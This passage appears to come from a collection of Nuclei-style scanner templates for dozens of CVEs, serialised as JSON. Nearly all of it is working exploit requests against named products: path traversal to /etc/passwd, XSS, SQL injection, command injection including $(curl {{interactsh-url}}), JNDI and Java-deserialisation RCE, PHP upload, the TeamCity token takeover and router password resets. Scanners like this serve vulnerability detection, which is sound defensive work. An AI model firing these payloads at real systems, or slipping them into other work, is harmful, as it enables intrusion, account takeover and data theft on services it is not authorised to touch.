Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<script>alert(document.domain)</script>\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-5074","info":{"name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dview8/api/usersByLevel HTTP/1.1\nHost: {{Hostname}}\nAuthorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1318","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3edhvmt&condition=1001","scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Emui2bt(document.domain)%3C%2fscript%3Edhvmt","scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euoq07","scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(document.domain)%3c/script%3em7dak","scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(document.domain)%3c/script%3ez2p1d"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"><script>alert(document.domain)</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-47211","info":{"name":"ManageEngine OpManager - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /two_factor_auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains(body, \"MIBFile with same name already exists\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"x_zcsrf_token","group":1,"part":"header","regex":["Set-Cookie: opmcsrfcookie=([^;]{50,})"],"internal":true}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-6329","info":{"name":"Control iD iDSecure - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/login/unlockGetData HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["serial"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"serial","internal":true,"json":[".serial"]}]},{"raw":["POST /api/login/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"passwordCustom\": \"{{javascript_response}}\", \"passwordRandom\": \"{{passwordRandom}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["accessToken"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"access-token","internal":true,"json":[".accessToken"]}]},{"raw":["POST /api/operator/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{access-token}}\nContent-Type: application/json\n\n{\"idType\": \"1\", \"name\": \"{{username}}\", \"user\": \"{{username}}\", \"newPassword\": \"{{password}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/json\")","contains_all(body, \"code\", \"newID\")"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4148","info":{"name":"Ditty < 3.1.25 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(/XSS/)</script>\") && contains(body_2, \"ditty\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-47105","info":{"name":"Chaosblade < 1.7.4 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /chaosblade?cmd=$(id) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"uid=\", \"code\", \"success\\\":false\", \"error\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?>\n  <methodCall>\n    <methodName>{{randstr}}</methodName>\n    <params>\n      <param>\n      <value>\n        <struct>\n       <member>\n          <name>test</name>\n          <value>\n      <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n          </value>\n        </member>\n      </struct>\n      </value>\n    </param>\n    </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<name>faultString</name>"]}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named <img src=\\\"\\\" onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<token name=\"RPC2\" creationTime"]},{"type":"word","part":"body_5","words":["StdOut:{{randstr}}"]}],"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up 